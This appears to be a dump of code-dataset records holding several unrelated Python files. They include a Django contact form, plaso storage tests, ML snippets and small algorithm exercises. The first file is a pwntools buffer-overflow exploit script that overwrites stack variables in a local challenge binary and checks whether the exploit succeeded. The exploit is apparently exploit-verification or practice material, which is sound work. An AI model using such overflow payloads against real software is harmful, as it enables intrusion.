626daf6e923459b44b82521aa4cb944aad0dbced
|
9dec8085b62a446f7562adfeccf70f8bfcdbb738
|
refs/heads/master
| 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 776 |
py
|
from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-07-x64")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=64)
bof_payload.set_input_start(0x48)
bof_payload.add_int32(0x14, 0xdead)
bof_payload.add_int32(0x10, 0xdeae)
bof_payload.add_int32(0xc, 0xdeae)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
|
[
"[email protected]"
] | |
3b3394be7b0f7c6c13b2006438556a5f0c7303ff
|
7848e1b778ca0f3921aeeb0aeee44b398711b1f0
|
/funtesting/mock/__init__.py
|
495f052105769c8dfec9019cc49217d5fe565c55
|
[] |
no_license
|
fatelei/funtesting
|
a3a292ddfa30d9fbad47ee293768558b9e45fe8d
|
748f4b5767cc16929408b19a5b62a812b48a0dd5
|
refs/heads/master
| 2021-01-10T12:09:38.809451 | 2016-02-21T03:59:15 | 2016-02-21T03:59:15 | 51,986,949 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 158 |
py
|
# -*- coding: utf8 -*-
"""
funtesting.mock
~~~~~~~~~~~~~~~
Mock modules.
"""
from .mock_redis import mock_redis
__all__ = [
"mock_redis"
]
|
[
"[email protected]"
] | |
22c9b2072eee710b0af8c948145defea4346aa03
|
4aa7a4d0525095725eb99843c83827ba4806ceb1
|
/keras/keras110_5_LeakyReLU.py
|
213ecbe46b4073d61f4b984af0b9f92698fdaafd
|
[] |
no_license
|
seonukim/Study
|
65a70f5bdfad68f643abc3086d5c7484bb2439d4
|
a5f2538f9ae8b5fc93b5149dd51704e8881f0a80
|
refs/heads/master
| 2022-12-04T17:04:31.489771 | 2020-08-21T00:35:15 | 2020-08-21T00:35:15 | 260,144,755 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 283 |
py
|
# activation - LeakyReLU
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(-6, 6, 0.01)
def leakyrelu(x): # Leaky ReLU(Rectified Linear Unit)
return np.maximum(0.1 * x, x) #same
plt.plot(x, leakyrelu(x), linestyle = '--', label = 'Leaky ReLU')
plt.show()
|
[
"[email protected]"
] | |
8e0ed00e073de8a5bccb6b2d7fe1eef2ede522de
|
9e4df2b26e899f2d3e044e71bc4193958b02314b
|
/app/migrations/0027_auto_20200930_0118.py
|
bb05747fde99e2ecc6d9acb7db6fe524b26b1a36
|
[
"MIT"
] |
permissive
|
hosseinmoghimi/phoenix
|
afea0a73cdf257fcf89c75d85c5ab1890d957a83
|
43fc49421a50563acc1884981d391b0d6a5d5d72
|
refs/heads/master
| 2023-01-11T11:12:30.308822 | 2020-11-15T13:52:21 | 2020-11-15T13:52:21 | 295,109,751 | 1 | 5 |
MIT
| 2020-11-15T13:50:12 | 2020-09-13T08:31:01 |
HTML
|
UTF-8
|
Python
| false | false | 701 |
py
|
# Generated by Django 3.1 on 2020-09-29 21:48
from django.db import migrations
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('app', '0026_auto_20200930_0117'),
]
operations = [
migrations.AlterField(
model_name='jumbotron',
name='description',
field=tinymce.models.HTMLField(blank=True, max_length=2000, null=True, verbose_name='شرح کامل'),
),
migrations.AlterField(
model_name='jumbotron',
name='short_description',
field=tinymce.models.HTMLField(blank=True, max_length=1000, null=True, verbose_name='شرح کوتاه'),
),
]
|
[
"[email protected]"
] | |
0180991f5de6838806543f0af00e4bb397839b33
|
ef42fa903820055b9b0a8b4ebb1863a16d386171
|
/contact/forms.py
|
ee057df7c2a82d279ab2da12b60a6da4f9beac72
|
[] |
no_license
|
sinjorjob/django-simple-capture-inquery-form
|
2537c8e03bc2c0118f772b69a59866ffb34d7cac
|
8bd2900a6bdf97b97ddca7b7240b42f478e14884
|
refs/heads/master
| 2023-07-02T14:40:43.840669 | 2021-08-10T21:24:24 | 2021-08-10T21:24:24 | 394,784,208 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,570 |
py
|
from django import forms
from captcha.fields import CaptchaField, CaptchaTextInput
from django.core.mail import send_mail #追加
from config import settings #追加
from django.urls import reverse #追加
import smtplib #追加
class ContactForm(forms.Form):
name = forms.CharField(label="氏名")
email = forms.EmailField(label="連絡先アドレス")
subject = forms.CharField(label="タイトル")
message = forms.CharField(label="お問い合わせ内容",
widget=forms.Textarea(attrs={'rows':4, 'cols':40}))
captcha = CaptchaField(widget=CaptchaTextInput(attrs={'placeholder':'上記のアルファベットを入力してください。'}))
#ここから下を追加
def send_email(self):
subject = '[Inquiry Form] from %s' % settings.SITE_URL + reverse('contact_form')
name = self.cleaned_data['name']
email = self.cleaned_data['email']
message = self.cleaned_data['message']
body = """
氏名: %s
メールアドレス: %s
問い合わせ内容: %s
""" %(name, email, message)
sender = email
receipient = settings.EMAIL_HOST_USER
try:
response = send_mail(
subject, #タイトル
body, #内容
sender, #送信者
[receipient], #受信者
fail_silently=False,
)
except smtplib.SMTPException:
pass
return response
|
[
"[email protected]"
] | |
626ccb2e51e4602bed82ff9ee6f72b36dc9f0add
|
0e647273cffc1fb6cbd589fa3c7c277b221ba247
|
/configs/hpt-pretrain/bdd/byol_r50_bs2048_accmulate2_ep200/500-iters.py
|
215d809fb24ebc2a34d497fc2f4750a359313eda
|
[
"Apache-2.0"
] |
permissive
|
Berkeley-Data/OpenSelfSup
|
e9976bf011b69ebf918506ba184f464b1073ec13
|
221191b88d891de57725b149caf237ffef72e529
|
refs/heads/master
| 2023-05-12T07:34:52.268476 | 2021-04-08T00:58:37 | 2021-04-08T00:58:37 | 343,654,823 | 0 | 1 |
Apache-2.0
| 2021-04-08T00:58:37 | 2021-03-02T05:20:27 |
Python
|
UTF-8
|
Python
| false | false | 237 |
py
|
_base_="../byol-base-bdd-config.py"
# this will merge with the parent
model=dict(pretrained='data/basetrain_chkpts/byol_r50_bs2048_accmulate2_ep200.pth')
# epoch related
total_iters=500*2
checkpoint_config = dict(interval=total_iters)
|
[
"[email protected]"
] | |
5898c1034a4038ecddbfd07e7567ec2b0facdbee
|
03c9bb7e3cc687afecd57c6c6e3d5c1d54ed7ab0
|
/smilejakdu/3week/3day/MaximumSubarray.py
|
745fb6d684c6125416fb3fa0eafd62e8a9348e99
|
[] |
no_license
|
smilejakdu/python_algorithm_study
|
541aa3de77e9f432d41b5627790a6f3e10f5a07d
|
5119b31b6ae781e12bf97134ca6f10fec662abd8
|
refs/heads/master
| 2023-04-06T15:41:41.156021 | 2020-08-10T08:58:34 | 2020-08-10T08:58:34 | 282,879,639 | 0 | 0 | null | 2020-08-01T07:04:38 | 2020-07-27T11:36:31 |
Python
|
UTF-8
|
Python
| false | false | 897 |
py
|
''':arg
Given an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.
Input: [-2,1,-3,4,-1,2,1,-5,4],
Output: 6
Explanation: [4,-1,2,1] has the largest sum = 6.
'''
nums = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
''':arg
maxcurr = nums[0]
maxglobal = nums[0]
우선적으로 index 0 에 대한 값을 넣는다 .
반복문을 1부터 돌린다.
max 함수를 이용해서 , nums[i] 와 , maxcurr + nums[i] 의 값을 비교한다 .
큰 값을 다시 maxcurr 변수에 넣는다.
maxcurr 변수와 maxglobal 변수를 비교한다.
'''
def maxSubArray(nums):
maxcurr = nums[0]
maxglobal = nums[0]
for i in range(1, len(nums)):
maxcurr = max(nums[i], maxcurr + nums[i])
maxglobal = max(maxcurr, maxglobal)
return maxglobal
print(maxSubArray(nums))
|
[
"[email protected]"
] | |
62be29a83225382074ef88884da70792ec0067e6
|
00ce0f4d0c380d60cb336484200153636b249120
|
/tests/agents/trade/test_case_mixin.py
|
271f41ecbbe4a1c7723057a2e8fabc60c2e0e0c9
|
[
"MIT"
] |
permissive
|
tezheng/hearthbreaker
|
21784aeba11f557703e22a23af54886c496d3fec
|
169ad0d00e62300054e7cbaf5562d750f28730a8
|
refs/heads/master
| 2021-01-15T14:30:05.542012 | 2014-09-24T20:03:12 | 2014-09-24T20:03:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,925 |
py
|
import random
from tests.agents.trade.test_helpers import TestHelpers
from hearthbreaker.agents.trade.trade import Trades
class TestCaseMixin:
def setUp(self):
TestHelpers.fix_create_minion()
random.seed(1857)
def add_minions(self, game, player_index, *minions):
player = game.players[player_index]
for minion in minions:
minion.use(player, game)
def make_all_active(self, game):
for player in game.players:
for minion in player.minions:
minion.active = True
minion.exhausted = False
def assert_minions(self, player, *names):
actual = self.card_names(player.minions)
self.assertEqual(sorted(actual), sorted(names))
def card_names(self, cards):
return [m.try_name() for m in cards]
def player_str(self, player):
res = []
res.append("\nPlayer\n")
res.append("Hand: ")
res.append(self.card_names(player.hand))
res.append("\nDeck: ")
res.append(self.card_names(player.deck.cards[0:5]))
res.append("\n")
res = [str(x) for x in res]
return str.join("", res)
def make_trades2(self, me, opp, game_callback=None):
me = [m for m in map(lambda c: c.create_minion(None), me)]
opp = [m for m in map(lambda c: c.create_minion(None), opp)]
game = self.make_game()
if game_callback:
game_callback(game)
trades = Trades(game.players[0], me, opp, game.players[1].hero)
return [game, trades]
def make_trades(self, me, opp):
return self.make_trades2(me, opp)[1]
def make_cards(self, *cards):
return [c for c in cards]
def make_game(self):
return TestHelpers().make_game()
def set_hand(self, game, player_index, *cards):
cards = self.make_cards(*cards)
game.players[player_index].hand = cards
|
[
"[email protected]"
] | |
87d413d7af90828f2782af0f4e847016caecc553
|
b403c7fe56209472855dff451f0b6283d5471008
|
/Supplemental_Material/PythonProjects/myFunctions/isItOdd.py
|
14037a63dbb500f808f9316903acca319e7bc678
|
[] |
no_license
|
Sandbox4KidsTM/Python_Basics
|
842bde52796896e913fdb5cc349034c52092555f
|
68c95547ec1567958fc8069e6a4bb119e436211a
|
refs/heads/master
| 2020-03-23T01:06:29.363196 | 2018-08-10T04:32:58 | 2018-08-10T04:32:58 | 140,901,128 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 173 |
py
|
#checks if a user-entered number if odd
a = int(input("enter a num: "))
if a % 2 == 0: #% modulus rep
print("number is EVEN")
else:
print("number is ODDDDD")
|
[
"[email protected]"
] | |
89e353022fef9fffa9f5835f74ae7501b8c1d990
|
3960fa9721ff97c8da99d010e27118ab0bc1201d
|
/tests/storage/fake_storage.py
|
c1437e781c494d82c715effbb93b4b9fafedaf40
|
[
"Apache-2.0"
] |
permissive
|
iamjoshbinder/plaso
|
d3ebbc216b4d89c8f8f6ab50f059b6db7bcca599
|
762aa1d1eb17760ef5e2708a48dff2acad7001ea
|
refs/heads/master
| 2021-08-08T13:23:10.146862 | 2017-11-09T10:44:09 | 2017-11-09T10:44:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,362 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the fake storage."""
import unittest
from plaso.containers import errors
from plaso.containers import event_sources
from plaso.containers import reports
from plaso.containers import sessions
from plaso.containers import tasks
from plaso.lib import definitions
from plaso.storage import fake_storage
from tests.storage import test_lib
class FakeStorageWriterTest(test_lib.StorageTestCase):
"""Tests for the fake storage writer object."""
def testAddAnalysisReport(self):
"""Tests the AddAnalysisReport function."""
session = sessions.Session()
analysis_report = reports.AnalysisReport(
plugin_name=u'test', text=u'test report')
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.AddAnalysisReport(analysis_report)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddAnalysisReport(analysis_report)
def testAddError(self):
"""Tests the AddError function."""
session = sessions.Session()
extraction_error = errors.ExtractionError(
message=u'Test extraction error')
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.AddError(extraction_error)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddError(extraction_error)
def testAddEvent(self):
"""Tests the AddEvent function."""
session = sessions.Session()
test_events = self._CreateTestEvents()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
event = None
for event in test_events:
storage_writer.AddEvent(event)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddEvent(event)
def testAddEventSource(self):
"""Tests the AddEventSource function."""
session = sessions.Session()
event_source = event_sources.EventSource()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.AddEventSource(event_source)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddEventSource(event_source)
def testAddEventTag(self):
"""Tests the AddEventTag function."""
session = sessions.Session()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
test_events = self._CreateTestEvents()
for event in test_events:
storage_writer.AddEvent(event)
event_tag = None
test_event_tags = self._CreateTestEventTags(test_events)
for event_tag in test_event_tags:
storage_writer.AddEventTag(event_tag)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddEventTag(event_tag)
def testOpenClose(self):
"""Tests the Open and Close functions."""
session = sessions.Session()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.Close()
storage_writer.Open()
storage_writer.Close()
storage_writer = fake_storage.FakeStorageWriter(
session, storage_type=definitions.STORAGE_TYPE_TASK)
storage_writer.Open()
storage_writer.Close()
storage_writer.Open()
with self.assertRaises(IOError):
storage_writer.Open()
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.Close()
def testGetEvents(self):
"""Tests the GetEvents function."""
session = sessions.Session()
test_events = self._CreateTestEvents()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
event = None
for event in test_events:
storage_writer.AddEvent(event)
events = list(storage_writer.GetEvents())
self.assertEqual(len(events), len(test_events))
storage_writer.Close()
# TODO: add tests for GetEventSources.
# TODO: add tests for GetEventTags.
# TODO: add tests for GetFirstWrittenEventSource and
# GetNextWrittenEventSource.
def testGetSortedEvents(self):
"""Tests the GetSortedEvents function."""
session = sessions.Session()
test_events = self._CreateTestEvents()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
event = None
for event in test_events:
storage_writer.AddEvent(event)
events = list(storage_writer.GetSortedEvents())
self.assertEqual(len(events), len(test_events))
storage_writer.Close()
# TODO: add test with time range.
def testWriteSessionStartAndCompletion(self):
"""Tests the WriteSessionStart and WriteSessionCompletion functions."""
session = sessions.Session()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
storage_writer.WriteSessionStart()
storage_writer.WriteSessionCompletion()
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.WriteSessionStart()
with self.assertRaises(IOError):
storage_writer.WriteSessionCompletion()
storage_writer = fake_storage.FakeStorageWriter(
session, storage_type=definitions.STORAGE_TYPE_TASK)
storage_writer.Open()
with self.assertRaises(IOError):
storage_writer.WriteSessionStart()
with self.assertRaises(IOError):
storage_writer.WriteSessionCompletion()
storage_writer.Close()
def testWriteTaskStartAndCompletion(self):
"""Tests the WriteTaskStart and WriteTaskCompletion functions."""
session = sessions.Session()
task = tasks.Task(session_identifier=session.identifier)
storage_writer = fake_storage.FakeStorageWriter(
session, storage_type=definitions.STORAGE_TYPE_TASK, task=task)
storage_writer.Open()
storage_writer.WriteTaskStart()
storage_writer.WriteTaskCompletion()
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.WriteTaskStart()
with self.assertRaises(IOError):
storage_writer.WriteTaskCompletion()
storage_writer = fake_storage.FakeStorageWriter(session)
storage_writer.Open()
with self.assertRaises(IOError):
storage_writer.WriteTaskStart()
with self.assertRaises(IOError):
storage_writer.WriteTaskCompletion()
storage_writer.Close()
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
f18208cbe2c56461d40b39d71cffbfaf1b0fee2b
|
6af6a6fb7d0759be524f2592a470d91947e0e2bc
|
/RandomForest/src/dataset/sp_010_1e2.py
|
699dc20994db4aa94c5f33202f7ef75e147f7653
|
[] |
no_license
|
wasit7/ImageSearch
|
5094e56db46af0d05cf76e5b5110c5b92d5198fd
|
3cd7ab3fa3c89873c0b49b1311ed5e7c5f4b8939
|
refs/heads/master
| 2020-05-17T01:12:24.616821 | 2015-08-10T07:26:44 | 2015-08-10T07:26:44 | 22,672,379 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,887 |
py
|
"""
Contain class that provide spiral dataset to random forest.
@author: Krerkkiat
updated by Wasit
"""
import numpy as np
class SpiralDataset:
'''
Provide Spiral Dataset to Random Forest
'''
def __init__(self, clmax, spc):
'''
Initial routine.
Parameter(s):
clmax: int - Maximum number of class.
spc: int - Size of data per class per client.
'''
self.clmax = clmax # class max of dataset
self.spc = spc # q size per class per client
self.dimension = 2 # it is axis x and y
self.I = np.zeros([self.dimension, 0], dtype=np.float) # np.ndarray row vetor, hold features
self.L = np.array([], dtype=np.int) # np.array, hold label
# create I
for x in range(self.clmax):
theta = np.linspace(0, 2*np.pi, self.spc)+np.random.randn(self.spc)*0.4*np.pi/clmax + 2*np.pi*x/clmax
r = np.linspace(0.1, 1, self.spc)
self.I = np.append(self.I, [r*np.cos(theta), r*np.sin(theta)], axis=1)
self.L = np.append(self.L, np.ones(self.spc, dtype=np.int)*x, axis=1)
def getL(self, x):
'''
Lookup database for a lebel of data at x.
Parameter(s):
x: int or numpy.array - Index or indexes of data that you need to get label.
Return(s):
label: int - Label of data at x.
'''
return self.L[x]
def getI(self, theta, x):
'''
Lookup table by theta for tau (splitting parameter or threshold) at index x.
Parameter(s):
theta: int - theta that will use for lookup.
x: int - Index of data.
Return(s):
tau: float - tau or raw data of data at index x with dimension theta.
'''
return self.I[theta, x]
def getX(self):
'''
Make a list of index that will use when initial root node at Client side
Return(s):
idx_list: list - List of index of data.
'''
return np.arange(0, self.clmax * self.spc)
def getParam(self, X):
'''
Random theta and then get tau from that randomed theta at index x.
Parameter(s):
x: list - List of index that will use to get tau.
Return(s):
theta: list - List of randomed theta.
tau: list - List of tau with lookup by theta and x.
'''
theta = np.random.randint(self.dimension, size=len(X))
tau = self.getI(theta, X)
return theta, tau
def __str__(self):
'''
Nothing spacial, use when debug.
Return:
txt: str - String that represent this class.
'''
return 'clmax: {cm}, spc: {ql}'.format(cm=self.clmax, ql=self.spc)
if __name__ == '__main__':
clmax = 10
spc = int(1e2)
dataset = SpiralDataset(clmax, spc)
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.